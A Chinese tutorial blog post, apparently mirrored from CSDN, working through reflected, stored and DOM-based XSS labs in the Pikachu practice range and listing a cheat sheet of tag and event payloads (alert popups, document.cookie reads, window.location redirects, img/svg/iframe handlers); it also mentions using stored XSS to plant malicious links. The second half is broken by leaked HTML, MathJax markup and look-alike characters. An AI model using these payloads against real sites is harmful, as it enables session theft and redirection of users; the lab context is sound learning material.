Pikachu（皮卡丘靶场）初识XSS（常见标签事件及payload总结）

Pikachu（皮卡丘靶场）初识XSS（常见标签事件及payload总结）
目录

1、反射型xss(get)

2、反射性xss(post)

3、存储型xss

4、DOM型xss

5、DOM型xss-x

XSS又叫跨站脚本攻击，是HTML代码注入，通过对网页注入浏览器可执行代码，从而实现攻击。

1、反射型xss(get)

Which NBA player do you like?

由于提交框对输入长度有限制，我们直接对请求的参数 message 进行修改

使用alert进行进行弹窗测试，构造payload：
```
xss_reflected_get.php?message=<script>alert(1)</script>&submit=submit
```
出现弹窗

注意：如果测试内容不是数字，而是字符串，需要引号（单引号或者双引号）包裹。

比如：
```
xss_reflected_get.php?message=<script>alert('Myon')</script>&submit=submit
```
2、反射性xss(post)

使用很常见的弱口令

用户名：admin

密码：123456

登陆成功

先进行弹窗测试，这里没有长度限制

读取所有可从此位置访问的cookie，构造payload
```
<script>alert(document.cookie)</script>
```
拿到：

ant[uname]=admin;
ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815;
PHPSESSID=m8qbdmsb2npsiaktboiok0p9mo

很明显密码进行了md5加密，虽然md5加密是不可逆的，但是可以碰撞：

关于弹窗测试的常用payload：
```
<script>alert(/1/)</script>
<script>prompt(1)</script> 
<script>confirm(1)</script>
```
alert()方法：显示一条弹出提示消息和确认按钮的警告框，alert()是一个阻塞的函数，如果我们不点确认按钮，后面的内容就不会加载出来。

prompt()方法：显示提示用户进行输入的对话框，这个方法返回的是用户输入的字符串。

confirm()方法：显示一个含有指定消息和确认和取消按钮的确认框，如果点击"确定"返回true，否则返回false。

3、存储型xss

首先尝试获取cookie
```
<script>alert(document.cookie)</script>
```
实现网页直接跳转常用payload：
```
<script type="text/javascript">window.location.href="跳转的目的地址";</script>
<script type="text/javascript">window.location.replace("跳转的目的地址");</script>
<script type="text/javascript">window.location.assign("跳转的目的地址");</script>
```
关于三者的区别：

window.location.href：location.href是一个属性，改变url地址；

window.location.assign： assign会添加记录到浏览历史，可以点击后退返回上一页面；

window.location.replace ：通过指定URL替换当前缓存在历史里的项目，页面跳转后无法回退。

尝试将跳转页面替换为我自己博客主页地址，构造payload：
```
<script type="text/javascript">window.location.replace("https://blog.csdn.net/Myon5?type=blog");</script>
```
弹窗之后直接跳转到了我的CSDN个人主页面

为了更加清楚地反应储存型的特点：攻击代码会长期存在于服务器

我使用手机去访问这个页面：

也是出现了相同的弹窗，随后跳转至我的博客主页

我们还可以将一个恶意的URL通过存储型XSS挂到页面中（网页挂马），只要存在未打相应补丁的用户访问了挂马页面，恶意攻击者便可获取受害者的控制权限（配合MSF）。

4、DOM型xss

先进行弹窗测试，但是没有出现弹窗，回显：what do you see?

点击之后发现这里直接将我们提交的内容拼接到了url后面

查看源代码：

domxss 的函数从具有 id 为 "text" 的元素中获取输入值，然后将其作为链接的 href 属性值插入到具有 id 为 "dom" 的元素的 innerHTML 中。

尝试它给的payload：

'>

通过在链接的 href 属性中闭合单引号，然后插入一个图片元素，该元素的 onmouseover 事件触发一个弹窗，显示 "xss"。

当我将鼠标悬停在图片上时，触发弹窗

' οnclick="alert('xss')">

在链接的 href 属性中闭合单引号，然后插入一个新的 onclick 事件，该事件触发一个弹窗，显示 "xss"。

点击该链接，触发弹窗

触发的方式还有很多：

（1）使用JavaScript事件处理器
```
' onmouseover="alert('XSS')"
```
（2）使用嵌套标签
```
'><img src="#" onmouseover="alert('XSS')">
```
（3）通过onerror事件触发
```
'><img src=x onerror=alert('XSS')>
```
4、使用JavaScript伪协议（点击触发）
```
javascript:alert(1)
```
如果键入一个网站地址，点击后则会实现页面跳转

关于a标签：

点击触发
 https://blog.csdn.net/Myon5?type=blog">点击触发

其他常用标签

标签:

标签:
Click me
Click me
Click me

标签:<br> <iframe src="javascript:alert('XSS')">

<br> <iframe οnlοad=alert(1)></p> <p><br> <svg>标签:<br> <svg/οnlοad="alert('XSS')"><br> <svg><script>alert('XSS')</script></svg></p> <p><br> <body>标签:<br> <body οnlοad="alert('XSS')"></p> <p><br> <img>标签（嵌入JavaScript代码）:<br> <img src='x' οnerrοr='javascript:alert("XSS")'><br> <img src='x' οnerrοr='alert<span class="MathJax_Preview" style="color: inherit; display: none;"></span><span class="MathJax" id="MathJax-Element-1-Frame" tabindex="0" data-mathml="<math xmlns="http://www.w3.org/1998/Math/MathML"><mo stretchy="false">(</mo><mn>1</mn><mo stretchy="false">)</mo></math>" role="presentation" style="position: relative;"><nobr aria-hidden="true"><span class="math" id="MathJax-Span-1" style="width: 1.565em; display: inline-block;"><span style="display: inline-block; position: relative; width: 1.305em; height: 0px; font-size: 120%;"><span style="position: absolute; clip: rect(1.253em, 1001.2em, 2.555em, -999.997em); top: -2.133em; left: 0em;"><span class="mrow" id="MathJax-Span-2"><span class="mo" id="MathJax-Span-3" style="font-family: MathJax_Main;">(</span><span class="mn" id="MathJax-Span-4" style="font-family: MathJax_Main;">1</span><span class="mo" id="MathJax-Span-5" style="font-family: MathJax_Main;">)</span></span><span style="display: inline-block; width: 0px; height: 2.138em;"></span></span></span><span style="display: inline-block; overflow: hidden; vertical-align: -0.372em; border-left: 0px solid; width: 0px; height: 1.316em;"></span></span></nobr><span class="MJX_Assistive_MathML" role="presentation"><math xmlns="http://www.w3.org/1998/Math/MathML"><mo stretchy="false">(</mo><mn>1</mn><mo stretchy="false">)</mo></math></span></span>'></p> <p><img src=x οnerrοr=alert(1)><br> <img src=x οnerrοr=prompt(1);><br> <img src=javascript:alert('1')></p> <p><br> <input>标签:<br> <input type="text" value="'" οnmοuseοver="alert('XSS')"><br> <input type="text" value="'><img src=x οnerrοr=alert('XSS')>"></p> <p><br> <div>标签:<br> <div οnmοuseοver="alert('XSS')">Hover me</div><br> <div οnmοuseοver="alert('XSS')">Hover me</div></p> <p><br> <a>标签（使用DOM事件处理）:<br> <a href="#" οnclick="alert('XSS')">Click me</a><br> <a href="javascript:void(0)" οnclick="alert('XSS')">Click me</a></p> <p>其他：</p> <p><video src=x οnerrοr=prompt(1);><br> <audio src=x οnerrοr=prompt(1);></p> <p>常用事件<br> onclick: 点击触发（<img src=x οnclick=alert(1)>）<br> onerror: 当 src 加载不出来时触发（<img src=x οnerrοr=alert(1)>）<br> onload: 当 src 加载完毕触发（<img src=x οnlοad=alert(1)>）<br> onmouseover：鼠标指针移动到图片后触发（<img src=x οnmοuseοver=alert(1)>）<br> onmousemove: 鼠标指针移到指定的元素后触发（<img src=x οnmοusemοve=alert(1) >）<br> onfocus: 当 input 输入框获取焦点时触发（<input οnfοcus=javascript:alert(1) autofocus>）</p> <p></p> <h2 id="5%E3%80%81DOM%E5%9E%8Bxss-x"><a name="t4"></a>5、DOM型xss-x</h2> <p>查看源码</p> <p><img alt="" height="902" src="https://1000bd.com/contentImg/2023/11/17/104045087.png" ></p> <p>和前面的触发方式一样</p> <p><img alt="" height="724" src="https://1000bd.com/contentImg/2023/11/17/104045344.png" ></p> <p><img alt="" height="382" src="https://1000bd.com/contentImg/2023/11/17/104045333.png" ></p> <p></p> </div> </div> </li> <li class="list-group-item ul-li"> <b>相关阅读:</b><br> <nobr> <a href="/Article/Index/857703">私有化部署vs公有云部署，你知道这些不同吗？</a> <br /> <a href="/Article/Index/1337098">基于 JMeter API 开发性能测试平台</a> <br /> <a href="/Article/Index/1457800">【C语言】动态内存管理</a> <br /> <a href="/Article/Index/1392659">第四章：Python中的字典（下）</a> <br /> <a href="/Article/Index/921107">【博客489】prometheus-----PromQL数据类型与Metrics数据类型</a> <br /> <a href="/Article/Index/752700">Com多进程通信实现</a> <br /> <a href="/Article/Index/1022650">校园‘‘跑腿经济’’</a> <br /> <a href="/Article/Index/1422643">服务运营｜文章精选：运筹学视角下的众包竞赛</a> <br /> <a href="/Article/Index/1761877">搭建hadoop+spark完全分布式集群环境</a> <br /> <a href="/Article/Index/1013039">在微信小程序上做一个「博客园年度总结」：后端部分</a> <br /> </nobr> </li> <li class="list-group-item from-a mb-2"> 原文地址：https://blog.csdn.net/Myon5/article/details/134396767 </li> </ul> </div> <div class="col-lg-4 col-sm-12"> <ul class="list-group" style="word-break:break-all;"> <li class="list-group-item ul-li-bg" aria-current="true"> 最新文章 </li> <li class="list-group-item ul-li"> <nobr> <a href="/Article/Index/1484446">攻防演习之三天拿下官网站群</a> <br /> <a href="/Article/Index/1515268">数据安全治理学习——前期安全规划和安全管理体系建设</a> <br /> <a href="/Article/Index/1759065">企业安全 | 企业内一次钓鱼演练准备过程</a> <br /> <a href="/Article/Index/1485036">内网渗透测试 | Kerberos协议及其部分攻击手法</a> <br /> <a href="/Article/Index/1877332">0day的产生 | 不懂代码的"代码审计"</a> <br /> <a href="/Article/Index/1887576">安装scrcpy-client模块av模块异常，环境问题解决方案</a> <br /> <a href="/Article/Index/1887578">leetcode hot100【LeetCode 279. 完全平方数】java实现</a> <br /> <a href="/Article/Index/1887512">OpenWrt下安装Mosquitto</a> <br /> <a href="/Article/Index/1887520">AnatoMask论文汇总</a> <br /> <a href="/Article/Index/1887496">【AI日记】24.11.01 LangChain、openai api和github copilot</a> <br /> </nobr> </li> </ul> <ul class="list-group pt-2" style="word-break:break-all;"> <li class="list-group-item ul-li-bg" aria-current="true"> 热门文章 </li> <li class="list-group-item ul-li"> <nobr> <a href="/Article/Index/888177">十款代码表白小特效一个比一个浪漫赶紧收藏起来吧！！！</a> <br /> <a href="/Article/Index/797680">奉劝各位学弟学妹们，该打造你的技术影响力了！</a> <br /> <a href="/Article/Index/888183">五年了，我在 CSDN 的两个一百万。</a> <br /> <a href="/Article/Index/888179">Java俄罗斯方块，老程序员花了一个周末，连接中学年代！</a> <br /> <a href="/Article/Index/797730">面试官都震惊，你这网络基础可以啊！</a> <br /> <a href="/Article/Index/797725">你真的会用百度吗？我不信 — 那些不为人知的搜索引擎语法</a> <br /> <a href="/Article/Index/797702">心情不好的时候，用 Python 画棵樱花树送给自己吧</a> <br /> <a href="/Article/Index/797709">通宵一晚做出来的一款类似CS的第一人称射击游戏Demo！原来做游戏也不是很难，连憨憨学妹都学会了！</a> <br /> <a href="/Article/Index/797716">13 万字 C 语言从入门到精通保姆级教程2021 年版</a> <br /> <a href="/Article/Index/888192">10行代码集2000张美女图，Python爬虫120例，再上征途</a> <br /> </nobr> </li> </ul> </div> </div> </div>     <nav class="navbar navbar-inverse navbar-fixed-bottom"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="text-muted center foot-height"> Copyright © 2022 侵权请联系<a href="mailto:2656653265@qq.com">2656653265@qq.com</a>    <a href="https://beian.miit.gov.cn/" target="_blank">京ICP备2022015340号-1</a> </div> <div style="width:300px;margin:0 auto; padding:0px 5px;"> <a href="/regex.html">正则表达式工具</a> <a href="/cron.html">cron表达式工具</a> <a href="/pwdcreator.html">密码生成工具</a> </div> <div style="width:300px;margin:0 auto; padding:5px 0;"> <a target="_blank" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=11010502049817" style="display:inline-block;text-decoration:none;height:20px;line-height:20px;"> <img src="" style="float:left;" /><p style="float:left;height:20px;line-height:20px;margin: 0px 0px 0px 5px; color:#939393;">京公网安备 11010502049817号</p></a> </div> </div> </div> </div> </nav>   <script src="/js/plugins/jquery/jquery.js"></script> <script src="/js/bootstrap.min.js"></script>   </body> </html>

1、反射型xss(get)

2、反射性xss(post)

3、存储型xss

4、DOM型xss